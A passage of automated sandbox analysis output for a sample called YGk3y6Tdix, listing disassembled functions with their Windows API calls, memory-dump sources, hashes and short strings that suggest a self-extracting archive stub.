                                                                                                                                                                                              • Instruction ID: 8dfd516a75def021128f55184938e69d8d149cf61ebab2905492eef3b5eec552
                                                                                                                                                                                              • Opcode Fuzzy Hash: ba4c0d484c4e40e0559174937670b913727e0c0a19f3e7430c191962f58be8cf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DF0C232B612265B0B224F76AC88BE633CB6E25769308043AE941D3240EB24CC507F92
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB14C2
                                                                                                                                                                                                • Part of subcall function 00FAB146: GetVersionExW.KERNEL32(?), ref: 00FAB16B
                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FB14E6
                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB1500
                                                                                                                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FB1513
                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1523
                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB1533
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                              • Opcode ID: e286f7340b62eeb720a2b17f8555227b15fdf17a11af1588f285bc2bb262be94
                                                                                                                                                                                              • Instruction ID: d09df96ef25002d876421761cd4715735babe722ec56f905a759d6f3b574264c
                                                                                                                                                                                              • Opcode Fuzzy Hash: e286f7340b62eeb720a2b17f8555227b15fdf17a11af1588f285bc2bb262be94
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2631F87550830AABC700DFA9C88499BB7F8BF98714F444A1EF999C3210E730D509DBA6
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00FC2AF1,00FC02FC,00FBFA34), ref: 00FC2B08
                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FC2B16
                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FC2B2F
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00FC2AF1,00FC02FC,00FBFA34), ref: 00FC2B81
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                              • Opcode ID: e5c7388b40f8cb465dac1af47bba1d2fece816e94ce8981f00d4e6784bdfaf8b
                                                                                                                                                                                              • Instruction ID: 18aff2c928f9671e1c9f48a1384655674b735d65ef529e5750099cf586bf416e
                                                                                                                                                                                              • Opcode Fuzzy Hash: e5c7388b40f8cb465dac1af47bba1d2fece816e94ce8981f00d4e6784bdfaf8b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6301D83250A71B6DE7942B747E87F163B56EB817B4760473EF120550F0EF114C007244
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00FE1030,00FC4674,00FE1030,?,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FC97E9
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC981C
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC9844
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC9851
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC985D
                                                                                                                                                                                              • _abort.LIBCMT ref: 00FC9863
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                              • Opcode ID: 3f87b3b235e35d09260b6b10f7757e30f29545abe84ae905ed0b46684fcaf56b
                                                                                                                                                                                              • Instruction ID: 6133ad9aa4e19589874005e5846797d00308260a35cc8ff3786193de8e2d257d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f87b3b235e35d09260b6b10f7757e30f29545abe84ae905ed0b46684fcaf56b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FF0443690860362C7123334BE0FF1B3B268FD2B74F24013DF625931D2EEA48802B265
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FBDC47
                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBDC61
                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBDC72
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00FBDC7C
                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00FBDC86
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FBDC91
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2148572870-0
                                                                                                                                                                                              • Opcode ID: ed5fccc7aec15d451e4179dc2d22b52e024c9c121517f9e84dc72e34dcc1de7a
                                                                                                                                                                                              • Instruction ID: 8d38efeb9fddaa1fee412948e06dea86e64292696760d12f9c9e2d599b185141
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed5fccc7aec15d451e4179dc2d22b52e024c9c121517f9e84dc72e34dcc1de7a
                                                                                                                                                                                              • Instruction Fuzzy Hash: BAF08C72A02219BBCB22ABA2DC0CDCB7F7DEF417A1F004011B50AE6045E63A8546CBA1
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0
                                                                                                                                                                                                • Part of subcall function 00FAB92D: _wcsrchr.LIBVCRUNTIME ref: 00FAB944
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FAC197
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FAC1DF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                                                                                                                              • String ID: .exe$.rar$.sfx
                                                                                                                                                                                              • API String ID: 3513545583-31770016
                                                                                                                                                                                              • Opcode ID: 7150fa32ee3845c1670eb5185e9d60489ad200fae5c247cca6148be2c9439729
                                                                                                                                                                                              • Instruction ID: 98c2ef80feeba6422ded626590e0682ea3e6dee48a3034314737ae9b23cf4db5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7150fa32ee3845c1670eb5185e9d60489ad200fae5c247cca6148be2c9439729
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC4139A6A0431195C732AF348C52A7B73A4EF42764F14490EF981AB182EB548D81F3E2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00FBCE9D
                                                                                                                                                                                                • Part of subcall function 00FAB690: _wcslen.LIBCMT ref: 00FAB696
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FBCED1
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,00FE946A), ref: 00FBCEF1
                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00FBCFFE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                              • String ID: %s%s%u
                                                                                                                                                                                              • API String ID: 110358324-1360425832
                                                                                                                                                                                              • Opcode ID: f4e072c3639d8c6dd3855a1ce2dc3568d047973614fbb293d1c84a58577ae487
                                                                                                                                                                                              • Instruction ID: 5a0239febd003aada78afb7b704c37c1b236ea7b13c220b6d8add858684bdc98
                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e072c3639d8c6dd3855a1ce2dc3568d047973614fbb293d1c84a58577ae487
                                                                                                                                                                                              • Instruction Fuzzy Hash: AD4163B5900259AADF21DB91CC85FEA77FDEB05350F4080A6F909E7041EE749A44EFB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FABB27
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00FAA275,?,?,00000800,?,00FAA23A,?,00FA755C), ref: 00FABBC5
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FABC3B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                                              • String ID: UNC$\\?\
                                                                                                                                                                                              • API String ID: 3341907918-253988292
                                                                                                                                                                                              • Opcode ID: da01eb4b9dc7284bf054848c5d31dcdede9a2c5d6399f41a684521ec1f0137cb
                                                                                                                                                                                              • Instruction ID: 7f5473e2713881b46eb3da325a25f495c4fb5fae454d148823cd0c1394cfb501
                                                                                                                                                                                              • Opcode Fuzzy Hash: da01eb4b9dc7284bf054848c5d31dcdede9a2c5d6399f41a684521ec1f0137cb
                                                                                                                                                                                              • Instruction Fuzzy Hash: AF41B7B1900216A6CF21AF61CC41FEB7769AF423A0F144566F514A3152EF74EE90FB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadBitmapW.USER32(00000065), ref: 00FBB6ED
                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00FBB712
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00FBB744
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00FBB767
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6D5
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA6EC
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA703
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: LockResource.KERNEL32(00000000,?,?,?,00FBB73D,00000066), ref: 00FBA712
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FBB73D,00000066), ref: 00FBA72D
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: GlobalLock.KERNEL32(00000000), ref: 00FBA73E
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FBA762
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FBA7A7
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00FBA7C6
                                                                                                                                                                                                • Part of subcall function 00FBA6C2: GlobalFree.KERNEL32(00000000), ref: 00FBA7CD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                              • String ID: ]
                                                                                                                                                                                              • API String ID: 1797374341-3352871620
                                                                                                                                                                                              • Opcode ID: d1f606b6b1e0afbc0e4a70775065bf335c17b1327fda5c36b03ff7c6ee747323
                                                                                                                                                                                              • Instruction ID: f08bcee7bb456719bcf1c668784fbce344d447083865e5658fee82da115de456
                                                                                                                                                                                              • Opcode Fuzzy Hash: d1f606b6b1e0afbc0e4a70775065bf335c17b1327fda5c36b03ff7c6ee747323
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B01D6369006056BC723B7765C49AFF7B7AAFC0762F180011F940AB285DFBACD056E61
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
                                                                                                                                                                                                • Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370
                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00FBD64B
                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FBD661
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FBD675
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00FBD684
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                                                                              • String ID: RENAMEDLG
                                                                                                                                                                                              • API String ID: 445417207-3299779563
                                                                                                                                                                                              • Opcode ID: c6b90d10e119bd0f20145e46d2dec2269d1df4a93df7907e255c27d161854fc7
                                                                                                                                                                                              • Instruction ID: c5b156cb09408a174eb20d5ff81470e054bb14b85058af7de455e0bdd859a488
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6b90d10e119bd0f20145e46d2dec2269d1df4a93df7907e255c27d161854fc7
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4014533645224BAD2224F669D09FE7776EBF5AB01F010011F345A6094C7A39904AF7A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FC7E24,00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002), ref: 00FC7E93
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FC7EA6
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00FC7E24,00000000,?,00FC7DC4,00000000,00FDC300,0000000C,00FC7F1B,00000000,00000002), ref: 00FC7EC9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                              • Opcode ID: 15f6eef74bd9efbbc44936df75dfba6f5c7c7df82ab257ee29c77d755e368491
                                                                                                                                                                                              • Instruction ID: 6c6ac6cb58ca13b3eb128fdde3015a9e417260c7f68925e3822029f07a1d7d3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15f6eef74bd9efbbc44936df75dfba6f5c7c7df82ab257ee29c77d755e368491
                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F06835E0120DBBCB11AFB0DC09B9EBFB6EF44715F0440AAF905E2250DB319E44EA91
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
                                                                                                                                                                                                • Part of subcall function 00FB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FAF2E4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00FE81C8,CryptUnprotectMemory), ref: 00FAF2F4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                                              • API String ID: 2141747552-1753850145
                                                                                                                                                                                              • Opcode ID: 5ad35197d5e39fb0efe971aacc45e5bc3dd79a74048017fb0cd39376badfdf14
                                                                                                                                                                                              • Instruction ID: 354a029ef17a68dc2612d325d8edb345d41d86bfda051807723425f9c44b86aa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ad35197d5e39fb0efe971aacc45e5bc3dd79a74048017fb0cd39376badfdf14
                                                                                                                                                                                              • Instruction Fuzzy Hash: 74E0DFB8A007029ECB209F74980CB027BD56F04714B08C82EE2CA93240CAB8D140AB22
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AdjustPointer$_abort
